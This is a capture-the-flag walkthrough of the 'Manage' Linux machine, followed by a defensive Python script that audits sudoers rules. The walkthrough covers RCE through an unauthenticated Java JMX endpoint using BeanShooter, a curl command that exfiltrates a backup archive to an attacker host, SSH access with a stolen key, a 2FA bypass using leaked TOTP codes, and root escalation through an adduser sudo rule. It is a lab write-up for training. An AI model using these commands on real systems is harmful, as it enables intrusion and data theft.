
Machine (Easy) - Manage

Writeup for the Manage machine, an easy-level Linux box focused on exploiting an unauthenticated Java RMI JMX endpoint on Apache Tomcat to gain shell access and escalate privileges.

Writeup Author: BobBuilder


Objective: Exploit an unauthenticated Java RMI JMX endpoint on Apache Tomcat to gain shell access, extract credentials, and escalate to root via sudo misconfiguration.

Category: Machine
Difficulty: Easy
Platform: Linux
Machine Author: fume & xct


Enumeration

nmap -sV -p- <manage_ip>
  • 22/tcp – OpenSSH 8.9p1 (Ubuntu)
  • 8080/tcp – Apache Tomcat 10.1.19
  • 2222/tcp, 42435/tcp – Java RMI endpoints
  • 33499/tcp – tcpwrapped

User

RMI Enumeration

We use BeanShooter to enumerate and interact with Java RMI endpoints on port 2222:

java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum <manage_ip> 2222
  • Discovered an exposed jmxrmi JMX interface with no authentication.
  • Enumerated internal Tomcat credentials:
    • manager : <REDACTED>
    • admin : <REDACTED>

This confirms the RMI service can be abused for remote interaction with the Tomcat server.

Remote Code Execution via BeanShooter

We leverage the exposed JMX service to deploy and execute a payload:

java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard <manage_ip> 2222 tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell <manage_ip> 2222
  • The first command sets up the payload class.
  • The second command spawns an interactive shell.
  • We gain a shell as tomcat:
    uid=1001(tomcat) gid=1001(tomcat)

File Extraction

Inside the Tomcat environment, we locate and exfiltrate a compressed backup containing sensitive files:

curl -X POST http://<attacker_ip>/upload -F 'files=@backup.tar.gz' --insecure
  • From the archive:
    • Extracted an OpenSSH private key (id_ed25519)
    • Found a .google_authenticator file with valid TOTP secrets and pre-generated codes

This provides everything needed for SSH-based access and bypassing 2FA.

SSH Access

We authenticate using the extracted SSH private key and bypass the TOTP prompt using one of the leaked codes:

ssh -i id_ed25519 useradmin@<manage_ip>
  • Successfully log in as useradmin.

Root

Sudo Permissions

Running sudo -l shows that useradmin can run adduser without a password, with the username argument restricted by a regex.

sudo -l

(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$

This allows us to create any new user whose username is purely alphanumeric.

Privilege Escalation

User admin

The /etc/sudoers file shows that any user in the admin group has full sudo access:

%admin ALL=(ALL) ALL

Adding the admin user

sudo /usr/sbin/adduser admin
  • The newly created admin user is automatically added to the admin group.
  • This allows us to escalate to root with sudo su.

su admin
sudo su
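As an added defensive check, not part of the original writeup, the following Python script audits sudoers rules for the combination exploited above: a regex-restricted adduser rule whose username pattern admits the name of a group that sudoers grants full rights (here ^[a-zA-Z0-9]+$ admits "admin"). The sample sudoers text, the tighter deploy rule, and the use of Python's re in place of sudo's POSIX regex engine are assumptions.

```python
import re

# Constructed sample /etc/sudoers mirroring the writeup's two rules (the regex-
# restricted NOPASSWD adduser entry, the %admin grant) plus a constructed
# tighter 'deploy' rule for comparison.
SAMPLE_SUDOERS = """\
root      ALL=(ALL:ALL) ALL
%admin    ALL=(ALL) ALL
useradmin ALL=(ALL:ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
deploy    ALL=(ALL:ALL) NOPASSWD: /usr/sbin/adduser ^svc-[a-z0-9]+$
"""

# %group spec whose command list is exactly ALL (full sudo rights).
GROUP_ALL_RE = re.compile(r"^%(\S+)\s+\S+=\([^)]*\)\s*(?:[A-Z]+:\s*)*ALL\s*$")
# User spec permitting adduser with a sudo 1.9.10+ regex argument (^...$).
ADDUSER_RE = re.compile(
    r"^(\S+)\s+\S+=\([^)]*\)\s*(?:[A-Z]+:\s*)*(\S*/adduser)\s+(\^\S*\$)\s*$"
)

def privileged_groups(sudoers):
    """Names of groups that sudoers grants ALL commands."""
    groups = set()
    for line in sudoers.splitlines():
        m = GROUP_ALL_RE.match(line.strip())
        if m:
            groups.add(m.group(1))
    return groups

def audit_adduser_rules(sudoers):
    """Flag adduser rules whose username regex admits a privileged group name."""
    groups = privileged_groups(sudoers)
    findings = []
    for line in sudoers.splitlines():
        m = ADDUSER_RE.match(line.strip())
        if not m:
            continue
        who, cmd, pattern = m.groups()
        try:  # assumption: Python re agrees with sudo's POSIX ERE for these patterns
            rx = re.compile(pattern)
        except re.error:
            continue  # unparseable pattern: skip rather than guess
        overlap = sorted(g for g in groups if rx.fullmatch(g))
        if overlap:
            findings.append({"user": who, "command": cmd,
                             "pattern": pattern, "groups": overlap})
    return findings

if __name__ == "__main__":
    for f in audit_adduser_rules(SAMPLE_SUDOERS):
        print(f["user"], f["command"], f["pattern"], "admits", f["groups"])
```

Only the useradmin rule is reported; the deploy rule's svc- prefix cannot match any privileged group name, which is the kind of pattern the sudoers entry should have used.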